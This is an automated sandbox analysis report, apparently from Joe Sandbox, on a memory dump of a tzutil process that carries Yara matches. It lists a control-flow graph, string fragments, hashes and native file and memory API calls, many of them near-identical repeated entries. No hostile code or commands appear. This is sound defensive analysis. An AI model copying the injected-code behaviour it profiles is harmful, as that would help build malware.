                                                    control_flow_graph 26 969f80-96a2c1 27 96a2cb-96a2d5 26->27 28 96a2d7-96a2f6 27->28 29 96a321-96a32b 27->29 31 96a308-96a319 28->31 32 96a2f8-96a306 28->32 30 96a33c-96a348 29->30 33 96a356 30->33 34 96a34a-96a354 30->34 35 96a31f 31->35 32->35 37 96a35d-96a364 33->37 34->30 35->27 38 96a396-96a3a0 37->38 39 96a366-96a394 37->39 40 96a3b1-96a3bd 38->40 39->37 41 96a3bf-96a3cb 40->41 42 96a3cd-96a3d7 40->42 41->40 43 96a3e8-96a3f4 42->43 45 96a3f6-96a409 43->45 46 96a40b-96a41c 43->46 45->43 47 96a42d-96a436 46->47 49 96a44c-96a456 47->49 50 96a438-96a44a 47->50 51 96a467-96a473 49->51 50->47 53 96a475-96a488 51->53 54 96a48a-96a48e 51->54 53->51 55 96a4b7 54->55 56 96a490-96a4b5 54->56 58 96a4be-96a4c7 55->58 56->54 59 96a5d0-96a5da 58->59 60 96a4cd-96a4d4 58->60 61 96a5eb-96a5f7 59->61 62 96a506-96a509 60->62 63 96a4d6-96a504 60->63 64 96a60e-96a618 61->64 65 96a5f9-96a60c 61->65 66 96a50f-96a518 62->66 63->60 67 96a629-96a635 64->67 65->61 69 96a534-96a543 66->69 70 96a51a-96a532 66->70 71 96a647-96a64e 67->71 72 96a637-96a63d 67->72 73 96a545 69->73 74 96a54a-96a554 69->74 70->66 78 96a6f7-96a6fb 71->78 79 96a654 call 98b450 71->79 75 96a645 72->75 76 96a63f-96a642 72->76 73->59 77 96a565-96a571 74->77 75->67 76->75 81 96a587-96a59b 77->81 82 96a573-96a585 77->82 83 96a73c-96a746 78->83 84 96a6fd-96a71e 78->84 89 96a659-96a663 79->89 90 96a5ac-96a5b5 81->90 82->77 91 96a757-96a760 83->91 87 96a720-96a729 84->87 88 96a72c-96a73a 84->88 87->88 88->78 92 96a674-96a67d 89->92 93 96a5b7-96a5c9 90->93 94 96a5cb 90->94 95 96a774-96a77e 91->95 96 96a762-96a772 91->96 98 96a67f-96a68b 92->98 99 96a68d-96a694 92->99 93->90 94->58 101 96a7b6-96a7ba 95->101 102 96a780-96a79a 95->102 96->91 98->92 106 96a696-96a6a7 99->106 107 96a6bd-96a6c7 99->107 103 96a7d5-96a7df 101->103 104 96a7bc-96a7d3 101->104 108 96a7a1-96a7a3 102->108 109 96a79c-96a7a0 102->109 113 96a7f0-96a7fa 103->113 104->101 114 96a6ae-96a6b0 106->114 115 96a6a9-96a6ad 106->115 112 96a6d8-96a6e4 107->112 110 96a7b4 108->110 111 96a7a5-96a7ae 108->111 109->108 110->95 111->110 112->78 116 96a6e6-96a6f5 112->116 117 96a811-96a81a 113->117 118 96a7fc-96a80f 113->118 119 96a6b2-96a6b8 114->119 120 96a6bb 114->120 115->114 116->112 118->113 119->120 120->99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ".$'$-q$.j$1G$4U$7$9$@<$B0$Ng$T_$[_$dr$n$o$tp$u$z$R$i
                                                    • API String ID: 0-3230942322
                                                    • Opcode ID: 9f584d8322f24883e4d8e3a379d8ce3c0d92b2e1194f65f733dc791a8c8145d3
                                                    • Instruction ID: bfa87a9703eff165ae7ad4b82e8ae15002eb7d1659a33a82338f56df8b7b3a2d
                                                    • Opcode Fuzzy Hash: 9f584d8322f24883e4d8e3a379d8ce3c0d92b2e1194f65f733dc791a8c8145d3
                                                    • Instruction Fuzzy Hash: BD32ACB0E05268CFEB24CF44C894BDDBBB1BB45308F5085D9D04A7B291C7B96A89CF56
                                                    Function 0097C9D0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 0097CAB1
                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 0097CAEE
                                                    • FindClose.KERNELBASE(?), ref: 0097CAF9
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    • Opcode ID: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                    • Instruction ID: 3ca151f1e667a7f13e10544ce6e1f51ab7991ed4951adabce040d613b0d6f265
                                                    • Opcode Fuzzy Hash: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                    • Instruction Fuzzy Hash: 1F3188B29003087BDB24EF64CC85FEF77BC9F84745F14455CB909A7281DAB0AA85CBA1
                                                    Function 00989480 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtCreateFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?,?,?), ref: 0098957B
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                    • Instruction ID: 8b7968a2d95dfdd5f1ea78f56d10a138d2013afbb7cb0022a56485453698b1e9
                                                    • Opcode Fuzzy Hash: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                    • Instruction Fuzzy Hash: 8031D0B5A05248AFDB54DF98D881EEFB7F9EF88304F108219F908A7340D734A951CBA5
                                                    Function 009895F0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtReadFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?), ref: 009896D6
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                    • Instruction ID: 6df24ae926f2c2f7036e0d6059f04e29ec139040ac01af8a794790b768ef1c20
                                                    • Opcode Fuzzy Hash: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                    • Instruction Fuzzy Hash: 0531E4B5A00208AFDB14DF98D881EEFB7F9EF88714F148209F958A7340D734A911CBA5
                                                    Function 009898E0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(009721AE,?,5BC7A5B0,00000000,00000004,00003000,?,?,?,?,?,009882FF,009721AE), ref: 009899A8
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                    • Instruction ID: ff85212ff40a3685cdd61a44f61b40399342fb6ea645470c88b15ab74259560b
                                                    • Opcode Fuzzy Hash: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                    • Instruction Fuzzy Hash: B32119B5A00249ABDB10EF98DC41FEFB7B9EF89700F104109F949AB341D775A9118BA5
                                                    Function 009896E0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                    • Instruction ID: eea6ed950fedaf0cb574ffd644832cedcc719f63981c7abc22b44ddf451bfeb3
                                                    • Opcode Fuzzy Hash: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                    • Instruction Fuzzy Hash: C11170716013087BD660EA64DC42FABB3ACDFC5714F104149F94CAB241DB7579058BA6
                                                    Function 00989780 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 009897B1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                    • Instruction ID: 865a36bf4dd1f84314f1d41416385cacd5c197a2eb0e5e88074021ec9d63a666
                                                    • Opcode Fuzzy Hash: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                    • Instruction Fuzzy Hash: F2E08C36201604BBE220FA59DC01F9BB76DEFC6720F008015FA48A7241C672B9148BF1
                                                    Function 03474340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 999881ee96d21e81fef1215127109708f4520cbe74ac6073b0c152aa10bc69b4
                                                    • Instruction ID: 72c92bbcb24c92b6a2295692ef5c4e4972709a11658c111f7618beda93aab60a
                                                    • Opcode Fuzzy Hash: 999881ee96d21e81fef1215127109708f4520cbe74ac6073b0c152aa10bc69b4
                                                    • Instruction Fuzzy Hash: 4D900231605804129140B25848C458A4006D7F0301B95C012E0424958C8B148A565365
                                                    Function 03474650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: dc00c96bad191c4697036bd28f6d791f7d8457f265c58a44dc25d1c8497a6615
                                                    • Instruction ID: 09a6dc104a7221763c81892134439d020f2e9f20716e62529d814148475769c9
                                                    • Opcode Fuzzy Hash: dc00c96bad191c4697036bd28f6d791f7d8457f265c58a44dc25d1c8497a6615
                                                    • Instruction Fuzzy Hash: 84900261601504424140B258484444A6006D7F13013D5C116A0554964C87188955926D
                                                    Function 034735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b9825105942e779f8b352d68d82bda0f9eae152e97186c4aee66648c490b0f21
                                                    • Instruction ID: 4bca997d960333c53abf703bb35b18ff92955c10a8950eac8f555f58a6710de8
                                                    • Opcode Fuzzy Hash: b9825105942e779f8b352d68d82bda0f9eae152e97186c4aee66648c490b0f21
                                                    • Instruction Fuzzy Hash: 2690023160550802D100B258455474A1006C7E0301FA5C412A042496CD87958A5165A6
                                                    Function 03472B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 95e15aa7820ea37cae0e72f35633bf8c4abfdef1cd67152372a387abca9edb48
                                                    • Instruction ID: 7696a08e5a0c48e97cb664b4b09091bd128144885373470c9bf44bae4d9bad19
                                                    • Opcode Fuzzy Hash: 95e15aa7820ea37cae0e72f35633bf8c4abfdef1cd67152372a387abca9edb48
                                                    • Instruction Fuzzy Hash: 86900261202404034105B258445465A400BC7F0301B95C022E1014994DC72589916129
                                                    Function 03472BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 56c43f02746c319b28b8f694ab1669c35885a25df32d35be58ac5247bd37f954
                                                    • Instruction ID: 5cb4092ec6905c91303e444233e23db69c8a7823047fe6b16d9bf8a262b4ba3a
                                                    • Opcode Fuzzy Hash: 56c43f02746c319b28b8f694ab1669c35885a25df32d35be58ac5247bd37f954
                                                    • Instruction Fuzzy Hash: 7F90023120544C42D140B2584444A8A0016C7E0305F95C012A0064A98D97258E55B665
                                                    Function 03472BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: ae6dae04a31183f797cd141bcc70c21eabe959961fb1413dbc5ba4a2e4001053
                                                    • Instruction ID: bfb556593fc9188f6595328e0eef3940e6ea9b95108cc597480273b1cd83c652
                                                    • Opcode Fuzzy Hash: ae6dae04a31183f797cd141bcc70c21eabe959961fb1413dbc5ba4a2e4001053
                                                    • Instruction Fuzzy Hash: 0F90023120140C02D180B258444468E0006C7E1301FD5C016A0025A58DCB158B5977A5
                                                    Function 03472BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 205dda8ca7947066e8c048ef7efef9781cf025ac443f82423534e85e4cf55a9c
                                                    • Instruction ID: 11c38fe69be812629be4a4c4d52382f0f1785cab8268b41d6f3e95fd67f10d3c
                                                    • Opcode Fuzzy Hash: 205dda8ca7947066e8c048ef7efef9781cf025ac443f82423534e85e4cf55a9c
                                                    • Instruction Fuzzy Hash: 9290023160540C02D150B258445478A0006C7E0301F95C012A0024A58D87558B5576A5
                                                    Function 03472AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 22f7de448098a9f4c48f2a682c8f1ef755fbcfaa47434f822ea38d34894acd90
                                                    • Instruction ID: 69daad7016237f5548ded85334c572891d3c2dbd83542f723c1ab4b59bccc68d
                                                    • Opcode Fuzzy Hash: 22f7de448098a9f4c48f2a682c8f1ef755fbcfaa47434f822ea38d34894acd90
                                                    • Instruction Fuzzy Hash: EA900435311404030105F75C074454F0047C7F53513D5C033F1015D54CD731CD715135
                                                    Function 03472AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: eafd9c12e4bcd058fc169bb57aef2e9dbbebacc96cadbc8138ce139f17d9f337
                                                    • Instruction ID: 3439920f6f3c2e2ce0ef6eb975adae44e9dbe64eb16bc2de4f4d596b8514799e
                                                    • Opcode Fuzzy Hash: eafd9c12e4bcd058fc169bb57aef2e9dbbebacc96cadbc8138ce139f17d9f337
                                                    • Instruction Fuzzy Hash: 37900225221404020145F658064454F0446D7E63513D5C016F1416994CC72189655325
                                                    Function 034739B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 185f9c956e42f43e7be4556c48d3a137fda8d4e4f601cb687d0473a206269c4a
                                                    • Instruction ID: 47cdf6eec6ed39feeeb7053ae7b290b7846c0bf0ef8dc50b8db8d3e1c38d803e
                                                    • Opcode Fuzzy Hash: 185f9c956e42f43e7be4556c48d3a137fda8d4e4f601cb687d0473a206269c4a
                                                    • Instruction Fuzzy Hash: B490022124545502D150B25C444465A4006E7F0301F95C022A0814998D875589556225
                                                    Function 03472F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a6c46bb0a739b6535eca5193581950f4bb4144fe7aed55b0fd806c8cb6a62006
                                                    • Instruction ID: c14d874ccc1f0c1e00700b0332997a2ac578efca10b798a98b9ae6454404502b
                                                    • Opcode Fuzzy Hash: a6c46bb0a739b6535eca5193581950f4bb4144fe7aed55b0fd806c8cb6a62006
                                                    • Instruction Fuzzy Hash: F090026134140842D100B2584454B4A0006C7F1301F95C016E1064958D8719CD52612A
                                                    Function 03472FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 658390109daa7272b6d252a106a63f1ec800042c1589717b036c1192c10602ac
                                                    • Instruction ID: 8578209f691f6f6d3f36360c5e96c9e92a940fe244bfb2d04a34e426fd988201
                                                    • Opcode Fuzzy Hash: 658390109daa7272b6d252a106a63f1ec800042c1589717b036c1192c10602ac
                                                    • Instruction Fuzzy Hash: 6B900221211C0442D200B6684C54B4B0006C7E0303F95C116A0154958CCB1589615525
                                                    Function 03472FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c5893831817649cb1e1e44d0510f1dc0d2af392abf5f640d6a28f0f95e01da98
                                                    • Instruction ID: 1b8e297135e053990b57d6a5726b469420328d6dd36b46e306be3dfe52296c16
                                                    • Opcode Fuzzy Hash: c5893831817649cb1e1e44d0510f1dc0d2af392abf5f640d6a28f0f95e01da98
                                                    • Instruction Fuzzy Hash: 97900221601404424140B268888494A4006EBF1311795C122A0998954D875989655669
                                                    Function 03472EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 5e93a703c7f5f54fc9e144388878dbb1c25cbcaf6e3f42b7074de15c1c7a85be
                                                    • Instruction ID: dfe9b4d20b83632294945e48237db2af787c42e5f342c93c6f8b94d8409d2823
                                                    • Opcode Fuzzy Hash: 5e93a703c7f5f54fc9e144388878dbb1c25cbcaf6e3f42b7074de15c1c7a85be
                                                    • Instruction Fuzzy Hash: DF90026120180803D140B658484464B0006C7E0302F95C012A2064959E8B298D516139
                                                    Function 03472E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 5ad20d37507022d2f2273f13ea7a713b5c9947c9313c6518467cc18144a7028d
                                                    • Instruction ID: 5b2508f1a83d2d699049f6d0716aa297cdb4ef6126c4b29bee7b16b2be661737
